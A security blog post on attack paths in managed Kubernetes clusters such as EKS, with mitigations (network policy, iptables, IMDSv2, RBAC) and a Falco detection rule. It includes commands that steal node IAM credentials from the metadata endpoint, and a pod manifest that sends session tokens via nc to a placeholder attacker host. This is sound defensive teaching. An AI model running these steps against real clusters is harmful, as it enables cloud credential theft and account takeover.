13 April 2023

All cloud providers have a managed Kubernetes cluster service. While they are widely adopted for their operational benefits, few DevSecOps teams have a handle on the associated security risks. I present the main dangers of a managed cluster, and how to deal with them.

Why use a managed cluster?

A managed cluster is a Kubernetes cluster provided as a PaaS, where much of the management is handled by the cloud provider. These services are widely used because they greatly simplify cluster management for Ops teams. The benefits of using managed clusters include:

  • Simple installation process
  • The cluster utilizes cloud features for complex operations such as disk management, provisioning of nodes and load balancers, etc.
  • The cloud provider manages the control plane entirely
  • Automatic updates can be implemented

The security gain of using managed clusters seems promising: the shared responsibility model guarantees that the cloud provider ensures the security of the control plane, and Kubernetes security best practices are implemented by default.

However, there are critical risks associated with the many interconnections between Kubernetes and the Cloud. These risks will be addressed in the rest of this article.

This article will focus solely on issues related to managed clusters and will not cover general Kubernetes cluster security best practices. For those interested in learning more about Kubernetes best practices, the official documentation is quite comprehensive.

I propose discussing the attacker's point of view to better understand the primary risks of a managed cluster.

How can a managed cluster be compromised?

The entry points for an attacker on a managed cluster are:

  • The API Server: It should never be made public. Filtering solutions such as a VPN, an administration bastion, or IP whitelisting should always be used to protect access to the API Server. It is important to note that anonymous access to the API is disabled by default in managed clusters.
  • The Cloud: This vector is specific to managed clusters. It is possible for attackers to access clusters via IAM (Identity and Access Management) rights. For example, in AWS, the following commands allow an attacker to obtain a kubeconfig file and subsequently access the cluster (although network access to the API Server is still required):
aws eks update-kubeconfig --name <cluster_name>
kubectl get pods
  • Images deployed in the cluster: Compromising a pod via a malicious Docker image, or compromising the deployment pipeline, can give an attacker initial access to the cluster.
  • Ingress: Any application flaw of the Remote Code Execution type can allow an attacker to execute commands on a pod.

This is the last and most likely entry point for an external attacker who does not have access to the Cloud Provider, the API Server, or the deployment environment.

Let us assume that an attacker has taken control of a pod. There are several options to elevate their privileges:

  • Via a service account: Using the pod's service account to perform actions on the cluster or on the cloud. The default service account has no rights.
  • Elevating privileges to access the node: It is sometimes possible to escape from the pod to access the node (via bad security configuration or a vulnerable kernel). Access to the node often means the total compromise of the cluster.
  • Via network attacks: By definition, a pod can reach other pods and potentially join nodes. Several network attacks are possible here, for example:
    • Information leakage via the read-only API of the Kubelets on port 10255
    • Information leakage via Prometheus metrics
    • DNS Spoofing
  • Via node metadata: This attack vector is by far the most dangerous attack for managed clusters and is the most exploited by attackers.
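To make the network vector concrete, here is the kind of unauthenticated request an attacker could issue from a compromised pod when a kubelet's read-only port is exposed. This is a sketch; <node_ip> is a placeholder for a node's internal address, and the port is only reachable when the read-only API is enabled:

```shell
# Enumerate every pod running on the node via the kubelet read-only API
# (port 10255, no authentication required when the read-only port is enabled)
curl -s http://<node_ip>:10255/pods
```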

Focus on metadata

In the rest of this article, we will use EKS as an example, but you can apply the same attacks to AKS and GKE. The operation is essentially the same.

Every server instance in the cloud has metadata, a collection of information necessary for the server to function properly. The metadata of an AWS instance is available at the link-local IP address 169.254.169.254.

The nodes of a managed cluster are EC2 instances, which therefore have metadata.

This address is by default reachable from the pods. The metadata contains a lot of valuable information for an attacker:

  • Information about the instance: its AMI, hostname, id, IP address, zone, ...
  • Information about the cluster: the cluster name, the API Server certificate, the API Server address, ...
  • AWS access token linked to the instance role:
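For illustration, the credentials can be retrieved with two HTTP requests from any pod that can reach the metadata endpoint. This is a sketch assuming IMDSv1 is enabled; with IMDSv2, a session token header must be obtained first:

```shell
# List the IAM role attached to the node, then fetch its temporary credentials
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
```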


The node IAM policies officially recommended by AWS are:

  • AmazonEKSWorkerNodePolicy
  • AmazonEC2ContainerRegistryReadOnly

These policies give a lot of rights on the cloud. The attacker can use these rights in several ways:

  • Perform actions on AWS:
    • List all VPCs, subnets, and Security Groups of the AWS account.
    • Describe all EC2 instances (and their user-data, which often contain valuable information)
    • Remove all network interfaces
    • List and pull any Docker images from the ECR
  • Get access to the Kubernetes cluster as a member of the system:nodes group:
aws eks update-kubeconfig --name <cluster_name>

    • Read access to all pods (and their environment variables)
    • Read access to all secrets and configmaps that are used by its pods.
    • Access to the list of nodes, namespaces
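Concretely, once the kubeconfig above is in place, the node identity allows commands such as the following (illustrative; what is readable depends on which pods are scheduled on the impersonated node):

```shell
# Read workloads cluster-wide, including environment variables in pod specs
kubectl get pods --all-namespaces -o yaml
# Enumerate nodes and namespaces
kubectl get nodes
kubectl get namespaces
```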

Once the attacker can impersonate a node, it is only a matter of time before they obtain cluster-admin rights.

Forbidding access to metadata from pods is therefore absolutely critical in cluster security. Several techniques are possible depending on the situation:

  • Via a Network Policy, for example, if you already use them. Be careful: on AWS clusters that use the default network plugin aws-cni, Network Policies are not enforced.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-metadata-access
  namespace: example
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32
  • Via an iptables command on the nodes (if the pods have interfaces starting with eni):
yum install -y iptables-services
iptables --insert FORWARD 1 --in-interface eni+ --destination 169.254.169.254/32 --jump DROP
iptables-save | tee /etc/sysconfig/iptables 
systemctl enable --now iptables
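Another option on AWS, complementary to the above, is to require IMDSv2 and cap the token hop limit at 1, which prevents containerized processes (one network hop away from the instance) from obtaining a metadata token. A sketch using the standard AWS CLI call; the instance ID is a placeholder:

```shell
# Require session-oriented IMDSv2 and block token retrieval from containers
aws ec2 modify-instance-metadata-options \
  --instance-id <instance_id> \
  --http-tokens required \
  --http-put-response-hop-limit 1
```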

Cloud compromise via Kubernetes

Metadata is one thing, but also watch out for Kubernetes service accounts that have rights on the cloud provider. The cloud is a gateway to the Kubernetes cluster, and vice versa!

It is very easy and convenient to give pods rights on the cloud via a service account. Once the configuration steps are done, you just have to annotate the Kubernetes service account in this way:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: <service_account_name>
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::<ACCOUNT_ID>:role/<IAM_ROLE_NAME>

Any pod using this service account will then enjoy the rights of the IAM role on the Cloud environment. But an attacker will also be able to take advantage of these rights if, for example:

  • They compromised this pod:
aws sts get-session-token
{
    "Credentials": {
        "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
        "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYzEXAMPLEKEY",
        "SessionToken": "AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4OlgkBN9bkUDNCJiBeb/AXlzBBko7b15fjrBs2+cTQtpZ3CYWFXG8C5zqx37wnOE49mRl/+OtkIKGO7fAE",
        "Expiration": "2020-05-19T18:06:10+00:00"
    }
}
  • They have the right to create pods. They just need to create a pod with this service account:
apiVersion: v1
kind: Pod
metadata:
  name: legitimate
  labels:
    app: legitimate
spec:
  containers:
  - name: main
    image: alpine
    imagePullPolicy: IfNotPresent
    command: ["/bin/sh"]
    args: ["-c", "aws sts get-session-token | nc -nv <attack_ip> <attack_port>; sleep 100000"]
  serviceAccountName: <service_account_much_privileged>
  automountServiceAccountToken: true

(For this last point, good protection is to not lightly grant the right to create pods in namespaces that contain highly privileged service accounts.)
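To illustrate what that least-privilege stance can look like, here is a hypothetical Role that grants only read access to pods in a sensitive namespace, instead of the create rights that enable the attack above (all names are illustrative):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-reader
  namespace: privileged-namespace
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
```

You can audit who holds pod-creation rights in a namespace with kubectl auth can-i create pods -n <namespace> --as <subject>.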

Bonus: Intrusion detection

If you have applied all the good security practices and taken into account all the specificities related to your Cloud Provider, there is still one important step left before being state of the art: intrusion detection!

This practice consists in reducing the impact of 0-day vulnerabilities, human errors, or any other type of intrusion despite the protections in place. The goal is to detect malicious behavior as soon as possible and to alert the teams.

There is an open-source product to detect attacks in Kubernetes, hosted by the CNCF: Falco!


Falco can be deployed very simply as a DaemonSet and monitors activity at the pod, kernel, and API Server levels. The diversity of probes allows it to detect most of the classic patterns of compromise.

Moreover, it is possible to automatically send alerts via Slack, SMS, or email, to warn the teams as soon as possible.
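Tying this back to the metadata attack discussed earlier, a custom rule along the following lines could alert whenever a container contacts the metadata endpoint. This is a sketch written against Falco's rule syntax; validate the condition fields and macros against the Falco version you deploy:

```yaml
- rule: Contact metadata service from container
  desc: A process in a container opened a connection to the cloud metadata endpoint
  condition: outbound and fd.sip = "169.254.169.254" and container
  output: Metadata endpoint contacted from a container (command=%proc.cmdline pod=%k8s.pod.name)
  priority: WARNING
```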


We saw the classic attack vectors of a managed Kubernetes cluster, as well as the risks involved and the associated protections. We also discovered Falco, a powerful tool to detect intrusions in your Kubernetes cluster.

For more information, here is a practical demonstration of a Kubernetes cluster attack, from a talk I gave.